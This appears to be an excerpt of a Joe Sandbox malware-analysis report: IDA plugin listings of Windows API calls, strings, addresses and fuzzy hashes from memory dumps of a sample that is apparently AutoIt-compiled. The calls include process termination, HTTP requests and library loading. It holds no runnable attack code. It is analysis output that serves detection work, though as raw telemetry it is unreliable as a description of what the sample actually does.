                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E4284B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: c3b14f7c86778b4faf5f313ad668c40cbbddde3585889eb222a8159ba11c5972
                                                        • Instruction ID: 9836867ed7ef04fed4ae9f7963f236b60914b12115b0984beef1c0a45ce69de3
                                                        • Opcode Fuzzy Hash: c3b14f7c86778b4faf5f313ad668c40cbbddde3585889eb222a8159ba11c5972
                                                        • Instruction Fuzzy Hash: 8A0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A868CBE5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 1423608774-0
                                                        • Opcode ID: c69d01b868de3060a3a607b98c87b7af832b3f4c1fc658b4f94eacf877c42364
                                                        • Instruction ID: 1be458c1d12a177469986eda9c72c9114ed6ddbfaa4602fd4d89c489f9869a8e
                                                        • Opcode Fuzzy Hash: c69d01b868de3060a3a607b98c87b7af832b3f4c1fc658b4f94eacf877c42364
                                                        • Instruction Fuzzy Hash: 3501A932505211AFD71D2B55EC88DFF7769FF88701708147AF50BB20A1EB769806DB50
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E87C07
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E87C1D
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00E87C2C
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E87C3B
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E87C45
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E87C4C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: 4da6412c6fe97f8d3a02dc93189488c39f1d4896460a8f5dbdba75fe68f0fd76
                                                        • Instruction ID: d21939421111c2e5fe151c34d9f657ae27420c5163892760a370ea6b1e338359
                                                        • Opcode Fuzzy Hash: 4da6412c6fe97f8d3a02dc93189488c39f1d4896460a8f5dbdba75fe68f0fd76
                                                        • Instruction Fuzzy Hash: 91F03072146158BFE72157539C0DEEFBB7CEFC6B15F000038FA05A1151D7A25A46C6B5
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00E89A33
                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00EB5DEE,?,?,?,?,?,00E4ED63), ref: 00E89A44
                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00EB5DEE,?,?,?,?,?,00E4ED63), ref: 00E89A51
                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00EB5DEE,?,?,?,?,?,00E4ED63), ref: 00E89A5E
                                                          • Part of subcall function 00E893D1: CloseHandle.KERNEL32(?,?,00E89A6B,?,?,?,00EB5DEE,?,?,?,?,?,00E4ED63), ref: 00E893DB
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E89A71
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00EB5DEE,?,?,?,?,?,00E4ED63), ref: 00E89A78
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: 974f8418e2c5d726fec0f128d9d318d4c5324216b5a09e4fc29314356a43e8ab
                                                        • Instruction ID: d5e6a7a76e5a0e6eb6c357bd10d7f36f71375a3d54394a9d652c8584dfb0ab14
                                                        • Opcode Fuzzy Hash: 974f8418e2c5d726fec0f128d9d318d4c5324216b5a09e4fc29314356a43e8ab
                                                        • Instruction Fuzzy Hash: 63F05E32549211AFD71A2BA5EC89DAA7769FF84301B181436F507B10B1EB779806DB50
                                                        APIs
                                                          • Part of subcall function 00E5F4EA: std::exception::exception.LIBCMT ref: 00E5F51E
                                                          • Part of subcall function 00E5F4EA: __CxxThrowException@8.LIBCMT ref: 00E5F533
                                                        • __swprintf.LIBCMT ref: 00E41EA6
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E41D49
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 2125237772-557222456
                                                        • Opcode ID: decded493de13bce4423f085320fa6c729e4974fb0a2c5e3321f2acf8a6a696b
                                                        • Instruction ID: 6b87dce291473298b8bb242a67aaafb9f86a2bd57081e538b2aebeb2ae3ddd9b
                                                        • Opcode Fuzzy Hash: decded493de13bce4423f085320fa6c729e4974fb0a2c5e3321f2acf8a6a696b
                                                        • Instruction Fuzzy Hash: 5F919A715082019FCB24EF24E895CABB7E4EF85700F10696DF995B72A1DB70EE44CB92
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00E9B006
                                                        • CharUpperBuffW.USER32(?,?), ref: 00E9B115
                                                        • VariantClear.OLEAUT32(?), ref: 00E9B298
                                                          • Part of subcall function 00E89DC5: VariantInit.OLEAUT32(00000000), ref: 00E89E05
                                                          • Part of subcall function 00E89DC5: VariantCopy.OLEAUT32(?,?), ref: 00E89E0E
                                                          • Part of subcall function 00E89DC5: VariantClear.OLEAUT32(?), ref: 00E89E1A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4237274167-1221869570
                                                        • Opcode ID: df557935fc886b2d6536b059b72b363ce88511e804ab6fe424d6f27610caf14c
                                                        • Instruction ID: 4499b76de1122f1ff7e7912c5af59af77dab4427702e33d7df98f6ac039b8942
                                                        • Opcode Fuzzy Hash: df557935fc886b2d6536b059b72b363ce88511e804ab6fe424d6f27610caf14c
                                                        • Instruction Fuzzy Hash: D4917B70608301DFCB10DF24E58599ABBE4EF89704F14586EF89AAB362DB31ED45CB52
                                                        APIs
                                                          • Part of subcall function 00E5C6F4: _wcscpy.LIBCMT ref: 00E5C717
                                                        • _memset.LIBCMT ref: 00E85438
                                                        • GetMenuItemInfoW.USER32(?), ref: 00E85467
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E85513
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E8553D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 4152858687-4108050209
                                                        • Opcode ID: 4a67bca11d123891362834531e74152a7afab9b109e776673163a320ebc5c69c
                                                        • Instruction ID: abe185c05171ca0cfce4d17e2c3f561d7d8a937fb5d41abff3050cd50554e17b
                                                        • Opcode Fuzzy Hash: 4a67bca11d123891362834531e74152a7afab9b109e776673163a320ebc5c69c
                                                        • Instruction Fuzzy Hash: AB51F3732047019BD715AB28C8456BBBBE8AF85358F14262AF8AEF31D1DF60CD448B52
                                                        APIs
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E8027B
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E802B1
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E802C2
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E80344
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: DllGetClassObject
                                                        • API String ID: 753597075-1075368562
                                                        • Opcode ID: 1593159161443da733e50621c87f2c042907291eceffed735488abb79a976e3d
                                                        • Instruction ID: 569fe0001d4df19f2dc0294a6b5a3ef2fa9882ddf9e6760c8843e5059495db6e
                                                        • Opcode Fuzzy Hash: 1593159161443da733e50621c87f2c042907291eceffed735488abb79a976e3d
                                                        • Instruction Fuzzy Hash: AB417E72600204EFDB45DF54C885B9A7BB9EF44314B1490ADE90DEF216D7B1D949CBA0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00E85075
                                                        • GetMenuItemInfoW.USER32 ref: 00E85091
                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00E850D7
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F01708,00000000), ref: 00E85120
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        • Opcode ID: 4e98c004d601121c8a98986b73e981ca9243ab308de0f37b8c5cc8302e470588
                                                        • Instruction ID: 8ce97767cfe5efdcd8de2fbfe68089a2748cf2f9fcd750beb8567023ee16a16b
                                                        • Opcode Fuzzy Hash: 4e98c004d601121c8a98986b73e981ca9243ab308de0f37b8c5cc8302e470588
                                                        • Instruction Fuzzy Hash: C441C372205B019FD710EF24DC84F6ABBE5AF85318F04566EF85DA7291DB30E804CB62
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00EA0587
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower
                                                        • String ID: cdecl$none$stdcall$winapi
                                                        • API String ID: 2358735015-567219261
                                                        • Opcode ID: 629061e5f47ac048ccff8aaac4129f2c90643a01cfcf0dc787e2e9b5c21dae9a
                                                        • Instruction ID: acdb99ec082727dd5c89758c85f8176f8b18f5c99b02f3f2bc8714ade640b09f
                                                        • Opcode Fuzzy Hash: 629061e5f47ac048ccff8aaac4129f2c90643a01cfcf0dc787e2e9b5c21dae9a
                                                        • Instruction Fuzzy Hash: E7319370900115AFCF00EF54C8419EEB3B4FF95318B105A69E866BB6D1DB71E916CB80
                                                        APIs
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E7B88E
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E7B8A1
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E7B8D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 3850602802-1403004172
                                                        • Opcode ID: d8afae75291dc7a3fd03a6c9bf6c6acebdab3a0eab723914079245a5bdd3625a
                                                        • Instruction ID: 305e663344ecf9a45dedd2c92fa8c39a3750606b4658a3a22d9cb6e48767e1a5
                                                        • Opcode Fuzzy Hash: d8afae75291dc7a3fd03a6c9bf6c6acebdab3a0eab723914079245a5bdd3625a
                                                        • Instruction Fuzzy Hash: 9C210171900208AFEB08AB64DC86EFE77B8DF45314F10A129F529B31E0DB750D0A9620
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E94401
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E94427
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E94457
                                                        • InternetCloseHandle.WININET(00000000), ref: 00E9449E
                                                          • Part of subcall function 00E95052: GetLastError.KERNEL32(?,?,00E943CC,00000000,00000000,00000001), ref: 00E95067
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 1951874230-3916222277
                                                        • Opcode ID: e079692fed99aba301c54b0859c5a7c8dd075a0ab6c8635f8703af774896b6bf
                                                        • Instruction ID: 727fd3b37e9dfd96f28017b1b50153d204bd8cfda132264c0d583384ab808aa4
                                                        • Opcode Fuzzy Hash: e079692fed99aba301c54b0859c5a7c8dd075a0ab6c8635f8703af774896b6bf
                                                        • Instruction Fuzzy Hash: 5B2180F2500208BEEB219F55CC85EBFB6FCEB48B58F10902AF119B6180EA758D069771
                                                        APIs
                                                          • Part of subcall function 00E5D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E5D1BA
                                                          • Part of subcall function 00E5D17C: GetStockObject.GDI32(00000011), ref: 00E5D1CE
                                                          • Part of subcall function 00E5D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E5D1D8
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EA915C
                                                        • LoadLibraryW.KERNEL32(?), ref: 00EA9163
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EA9178
                                                        • DestroyWindow.USER32(?), ref: 00EA9180
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                        • String ID: SysAnimate32
                                                        • API String ID: 4146253029-1011021900
                                                        • Opcode ID: 39a70250b8d91f6f00f0ac279e9f28421761c1e3f7169ceb31c04f026c5b99b6
                                                        • Instruction ID: 7b65a776dd9da4158bc9e82c6a222c6b18fdf2950d1d552710e4ab301876f5f9
                                                        • Opcode Fuzzy Hash: 39a70250b8d91f6f00f0ac279e9f28421761c1e3f7169ceb31c04f026c5b99b6
                                                        • Instruction Fuzzy Hash: F4218071200206BFEF104F649C84EBB37A9EB6A368F115668F954AA191C736EC42A760
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00E89588
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E895B9
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00E895CB
                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E89605
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: 29ed5f28f6fee34e29d3cf95df18d3fcdd6523a5550f8c103c907edf77140233
                                                        • Instruction ID: 244074fa2641a0d31b498765c58520d382ccc8cf34f221a0ff34eb97a471a46f
                                                        • Opcode Fuzzy Hash: 29ed5f28f6fee34e29d3cf95df18d3fcdd6523a5550f8c103c907edf77140233
                                                        • Instruction Fuzzy Hash: A421A170A00205AFDB21AF25DC04EAE77E4AF44324F245A29F8ADF72E1E771D945CB20
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00E89653
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E89683
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00E89694
                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E896CE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: c28373266a46140b91deaa76d1d27c8eeb3d4993a29ca23fccfe6a9eb20a6cb7
                                                        • Instruction ID: 9f6e01c8d7891028a7e29e1f5bf22b45cf03f3e27fc94d5eef11fecf017ee88d
                                                        • Opcode Fuzzy Hash: c28373266a46140b91deaa76d1d27c8eeb3d4993a29ca23fccfe6a9eb20a6cb7
                                                        • Instruction Fuzzy Hash: BB21B6719002059FDB21AF699C44EAE77E8AF44734F281A28F8A9F72D1F771D845DB10
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E8DB0A
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E8DB5E
                                                        • __swprintf.LIBCMT ref: 00E8DB77
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00EDDC00), ref: 00E8DBB5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu
                                                        • API String ID: 3164766367-685833217
                                                        • Opcode ID: ea11c157e6eab2275dff30dfeb0fb725c18fb1654c28915e41d11e80dab0828b
                                                        • Instruction ID: e8a87780c6992fc891bb7bff3e00dec0063308561c65bba682873232a9b09c6d
